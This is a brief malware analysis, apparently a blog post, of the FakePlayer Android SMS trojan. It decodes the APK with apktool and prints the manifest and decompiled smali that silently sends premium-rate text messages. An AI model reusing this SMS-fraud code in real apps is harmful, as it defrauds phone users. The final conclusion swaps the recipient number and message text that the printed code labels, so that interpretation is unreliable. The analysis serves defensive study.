Trojan-SMS.AndroidOS.FakePlayer.a is one of the first malicious programs detected on Android Smartphones.
The program camouflages itself to look like a media player application and begins sending SMS to premium numbers without the user’s knowledge.
To analyze the .APK android file we can use the android-apktool (http://code.google.com/p/android-apktool/) to decode the application resources and study the program behaviour.
Let’s start decoding the resources with apktool:
pc201166154132:fakeplayer jaimeblasco$ apktool d RU.apk I: Baksmaling… I: Loading resource table… I: Decoding resources… I: Loading resource table from file: /Users/jaimeblasco/apktool/framework/1.apk I: Copying assets and libs…
Apktool obtains the following files from the APK:
pc201166154132:fakeplayer jaimeblasco$ find ./ ./ .//RU .//RU/AndroidManifest.xml .//RU/apktool.yml .//RU/res .//RU/res/drawable .//RU/res/drawable/icon.png .//RU/res/layout .//RU/res/layout/main.xml .//RU/res/values .//RU/res/values/public.xml .//RU/res/values/strings.xml .//RU/smali .//RU/smali/org .//RU/smali/org/me .//RU/smali/org/me/androidapplication1 .//RU/smali/org/me/androidapplication1/DataHelper$OpenHelper.smali .//RU/smali/org/me/androidapplication1/DataHelper.smali .//RU/smali/org/me/androidapplication1/HelloWorld.smali .//RU/smali/org/me/androidapplication1/MoviePlayer.smali .//RU/smali/org/me/androidapplication1/R$attr.smali .//RU/smali/org/me/androidapplication1/R$drawable.smali .//RU/smali/org/me/androidapplication1/R$layout.smali .//RU/smali/org/me/androidapplication1/R$string.smali .//RU/smali/org/me/androidapplication1/R.smali
If we open the file RU/AndroidManifest.xml we can see that the application request the android permission android.permission.SEND_SMS when it is installed.
?xml version="1.0" encoding="UTF-8"?
manifest package="org.me.androidapplication1"
xmlns:android="http://schemas.android.com/apk/res/android"
application android:icon="@drawable/icon"
activity android:label="Movie Player" android:name=".MoviePlayer"
intent-filter
action android:name="android.intent.action.MAIN"
category android:name="android.intent.category.LAUNCHER"
intent-filter
activity
application
uses-permission android:name="android.permission.SEND_SMS"
We observe that the application does some SQLite operations on /RU/smali/org/me/androidapplication1/DataHelper$OpenHelper.smali:
# static fields
.field private static final DATABASE_NAME:Ljava/lang/String; = "movieplayer.db"
.field private static final DATABASE_VERSION:I = 0x1
.field private static final INSERT:Ljava/lang/String; = "insert into table1(was) values ('was')"
.field private static final TABLE_NAME:Ljava/lang/String; = "table1"
The interesting operations can be found in RU/smali/org/me/androidapplication1/HelloWorld.smali:
.line 28
.local v0, m:Landroid/telephony/SmsManager;
const-string v1, "3353"
.line 29
.local v1, destination:Ljava/lang/String;
const-string v3, "798657"
.line 31
.local v3, text:Ljava/lang/String;
const/4 v2, 0x0
const/4 v4, 0x0
const/4 v5, 0x0
:try_start_0
invoke-virtual/range {v0 .. v5}, Landroid/telephony/SmsManager;->sendTextMessage(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Landroid/app/PendingIntent;Landroid/app/PendingIntent;)V
:try_end_0
.catch Ljava/lang/Exception; {:try_start_0 .. :try_end_0} :catch_0
.line 37
:goto_0
const-string v1, "3354"
.line 39
const/4 v2, 0x0
const/4 v4, 0x0
const/4 v5, 0x0
:try_start_1
invoke-virtual/range {v0 .. v5}, Landroid/telephony/SmsManager;->sendTextMessage(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Landroid/app/PendingIntent;Landroid/app/PendingIntent;)V
:try_end_1
.catch Ljava/lang/Exception; {:try_start_1 .. :try_end_1} :catch_1
The application uses the sendTextMessage function from the Android API:
public final void sendTextMessage (String destinationAddress, String scAddress, String text, PendingIntent sentIntent, PendingIntent deliveryIntent)
So, the malicious program tries to send SMS’s to destination 798657 using the service center addresses (SMSC) 3353 and 3354.
As we can see, this is a very simple piece of malware and it hasn’t got spreading capabilities so the risk is low because it wasn’t on Android Market.
